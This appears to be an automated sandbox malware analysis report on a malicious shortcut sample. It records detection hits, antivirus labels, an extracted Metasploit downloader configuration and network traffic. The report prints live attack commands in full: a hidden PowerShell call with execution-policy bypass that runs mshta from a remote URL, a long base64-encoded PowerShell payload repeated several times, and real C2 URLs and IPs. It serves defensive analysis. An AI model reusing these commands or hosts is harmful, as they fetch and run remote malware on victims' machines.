AFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVABOAEkANwAwAEIAQQBBAEIAZwA1AEoAZwA1AHAANgBNAF

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVABOAEkANwAwAEIAQQBBAEIAZwA1AEoAZwA1AHAANgBNAF

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'", ProcessId: 7288, ProcessName: powershell.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVABOAEkANwAwAEIAQQBBAEIAZwA1AEoAZwA1AHAANgBNAF

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'", ProcessId: 7288, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7684, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:21:16.390629+0100	2024449	1	Attempted User Privilege Gain	192.168.2.4	49719	91.218.228.26	80	TCP

ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:21:22.325494+0100	2816701	1	A Network Trojan was detected	91.218.228.26	80	192.168.2.4	49719	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://iplogger.cn/forensicsas.png/	Avira URL Cloud: Label: phishing
Source: https://iplogger.cn/forensicsas.pngS_BROWSER_APP_	Avira URL Cloud: Label: phishing
Source: https://mcnn.ru:8443/jquery-3.3.1.slim.min.js:r	Avira URL Cloud: Label: malware
Source: https://iplogger.cn/	Avira URL Cloud: Label: phishing
Source: https://iplogger.cn/forensicsas.pngD	Avira URL Cloud: Label: phishing
Source: https://iplogger.cn/forensicsas.png3	Avira URL Cloud: Label: phishing
Source: https://iplogger.cn/forensicsas.png31536000	Avira URL Cloud: Label: phishing
Source: https://iplogger.cn/forensicsas.pngf	Avira URL Cloud: Label: phishing
Source: https://mcnn.ru:8443/jquery-3.3.1.slim.min.js(r	Avira URL Cloud: Label: malware
Source: https://iplogger.cn/forensicsas.pnge	Avira URL Cloud: Label: phishing
Source: https://mcnn.ru:8443/jquery-3.3.1.slim.min.js	Avira URL Cloud: Label: malware
Source: https://iplogger.cn/~	Avira URL Cloud: Label: phishing
Source: https://mcnn.ru:8443/jquery-3.3.1.slim.min.js6V	Avira URL Cloud: Label: malware
Source: https://iplogger.cn/forensicsas.png~	Avira URL Cloud: Label: phishing
Source: https://iplogger.cn/forensicsas.png	Avira URL Cloud: Label: phishing
Source: https://iplogger.cn/forensicsas.pngX	Avira URL Cloud: Label: phishing
Source: https://mcnn.ru/	Avira URL Cloud: Label: malware
Source: http://mcnn.ru/jquery-3.3.1.slim.min.js	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ecols[1].hta

Avira: detection malicious, Label: VBS/Dldr.Agent.vrfx

Found malware configuration

Source: amsi64_7540.amsi.csv

Malware Configuration Extractor: Metasploit {"Headers": "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://mcnn.ru/jquery-3.3.1.slim.min.js"}

Multi AV Scanner detection for submitted file

Source: ____ ______.xls.lnk.bin.lnk	ReversingLabs: Detection: 26%
Source: ____ ______.xls.lnk.bin.lnk	Virustotal: Detection: 30%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: unknown

HTTPS traffic detected: 172.67.160.19:443 -> 192.168.2.4:49718 version: TLS 1.2

Source:	Binary string: .pDbY5 source: powershell.exe, 00000000.00000002.1186273619.00007FFC3DC30000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: HP_oXC:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1388672866.00000000074C9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: .textn.pdb ` source: powershell.exe, 00000006.00000002.1368654410.0000000002D90000.00000004.00000020.00020000.00000000.sdmp

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://mcnn.ru/jquery-3.3.1.slim.min.js

Source: global traffic

TCP traffic: 192.168.2.4:49726 -> 190.2.146.205:8443

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: WORLDSTREAMNL WORLDSTREAMNL

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: iplogger.cn

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.4:49719 -> 91.218.228.26:80
Source: Network traffic	Suricata IDS: 2816701 - Severity 1 - ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP : 91.218.228.26:80 -> 192.168.2.4:49719

Source: global traffic	HTTP traffic detected: GET /forensicsas.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: iplogger.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ecols.hta HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ecols.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /forensicsas.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: iplogger.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ecols.hta HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ecols.ru

Source: global traffic	DNS traffic detected: DNS query: iplogger.cn
Source: global traffic	DNS traffic detected: DNS query: ecols.ru
Source: global traffic	DNS traffic detected: DNS query: mcnn.ru

Source: powershell.exe, powershell.exe, 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1389805083.000000000783A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://code.jquery.com/
Source: svchost.exe, 00000005.00000002.2373086860.0000020DBBA8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: mshta.exe, 00000002.00000003.1169238850.000001B14895C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/
Source: mshta.exe, 00000002.00000003.2078431282.000001B148956000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2080837703.000001B94BBC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078610955.000001B94BAD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2079247893.000001B94BB91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078853336.000001B94BB2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2079383275.000001B94BB94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2088137748.000001B94BBDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.hta
Source: mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.hta(
Source: mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.hta...
Source: mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.hta...4
Source: mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.htaD
Source: mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.htaP
Source: mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.htaT
Source: mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2087103662.000001B148958000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078431282.000001B148956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.htaTKC:
Source: mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.htaX
Source: mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2087103662.000001B148958000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078431282.000001B148956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.htaY
Source: mshta.exe, 00000002.00000003.1169190097.000001B94B54A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.htaru/ecols.htaA
Source: mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2087103662.000001B148958000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078431282.000001B148956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ecols.ru/ecols.htas.png~
Source: svchost.exe, 00000005.00000003.1211090216.0000020DBB798000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000005.00000003.1211090216.0000020DBB798000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000005.00000003.1211090216.0000020DBB798000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000005.00000003.1211090216.0000020DBB7CD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
